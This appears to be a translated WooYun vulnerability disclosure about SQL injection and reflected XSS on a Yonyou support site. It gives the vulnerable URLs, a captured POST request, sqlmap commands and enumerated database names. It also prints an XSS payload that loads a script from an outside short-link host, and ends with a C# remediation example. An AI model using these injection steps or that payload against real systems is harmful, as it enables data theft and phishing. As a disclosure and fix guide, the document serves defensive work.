Vulnerability summary

Defect ID: wooyun-2015-096443

Title: SQL injection on a Yonyou subsite

Vendor: Yonyou Software (用友软件)

Author: 千斤拨四两

Submitted: 2015-02-11 17:48

Fix time: 2015-02-16 17:50

Public disclosure: 2015-02-16 17:50

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-02-11: details sent to the vendor, awaiting the vendor's handling
2015-02-16: the vendor actively ignored the vulnerability; details disclosed to the public

Summary:

The subsite has several POST injection points and a reflected XSS.

Details:

http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1
http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no


POST /AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1 HTTP/1.1
Host: service.yonyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1
Cookie: Hm_lvt_4280908fd6c5e0139940ea31e0eb68e1=1423411490; Hm_lpvt_4280908fd6c5e0139940ea31e0eb68e1=1423445237; ASP.NET_SessionId=gepvgwn2b3lfa445vesgxkmd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3210


Submit data in the search box, capture the request, and feed it to sqlmap.
The XSS is only reflected, but it can still be used for phishing.

http://service.yonyou.com/error.aspx?errinfo=1

Proof:

[screenshot: sql.png]

[screenshot: sq1.png]


available databases [9]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
[*] UFServiceClubData
[*] UFWeb
[*] UFWeb_Dev
[*] We7_CMS
sqlmap.py -r yonyou.txt -p TextBox1 -D We7_CMS --tables


[screenshot: sq.png]


http://service.yonyou.com//error.aspx?errinfo=1</textarea>'"><script src=http://t.cn/RwAegK3></script>


[screenshot: xss.png]

Fix:

Filter the input...
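As an added example (not code from the Yonyou site or from this report), here is a search handler written the way the report implies the page behaves, beside a hardened version: typed parameters for the query and HTML encoding for the `error.aspx` reflection. Only the request field names (`TextBox1`, `xinwenlxbh`, `errinfo`) come from the report; the `XinWen` table, its columns and the method names are assumptions.

```csharp
// Added example, not the site's own code. Schema (table XinWen, columns
// XinWenLXBH, BianHao, MingCheng) is assumed; field names are from the report.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class XinWenSearch
{
    // BEFORE: the search text from TextBox1 is pasted into the SQL string, so a
    // quote in the input changes the statement. This is the pattern sqlmap found.
    public static SqlCommand VulnerableQuery(SqlConnection conn, string lxbh, string text)
    {
        string sql = "SELECT BianHao, MingCheng FROM XinWen WHERE XinWenLXBH = '" + lxbh +
                     "' AND MingCheng LIKE '%" + text + "%'";
        return new SqlCommand(sql, conn);
    }

    // AFTER: values travel as typed parameters, never as SQL text. LIKE
    // wildcards in the user's input are escaped so they cannot widen the match.
    public static SqlCommand SafeQuery(SqlConnection conn, string lxbh, string text)
    {
        var cmd = new SqlCommand(
            "SELECT BianHao, MingCheng FROM XinWen " +
            "WHERE XinWenLXBH = @lxbh AND MingCheng LIKE @pattern ESCAPE '\\'", conn);
        cmd.Parameters.Add("@lxbh", SqlDbType.VarChar, 20).Value = lxbh ?? "";
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value =
            "%" + EscapeLike(text ?? "") + "%";
        return cmd;
    }

    // Escape the T-SQL LIKE metacharacters (% _ [) and the escape char itself.
    private static string EscapeLike(string s) =>
        s.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");

    // error.aspx reflected errinfo unencoded, which is the XSS in the report.
    // Encoding on output makes "</textarea><script>" inert regardless of input
    // filtering, so it is the fix to apply even if a filter is added as well.
    public static string RenderErrorInfo(string errinfo) =>
        "<textarea readonly>" + HttpUtility.HtmlEncode(errinfo ?? "") + "</textarea>";
}
```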

Copyright notice: when reposting, please credit the source: 千斤拨四两@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-02-16 17:50

Vendor reply:

Latest status:

None yet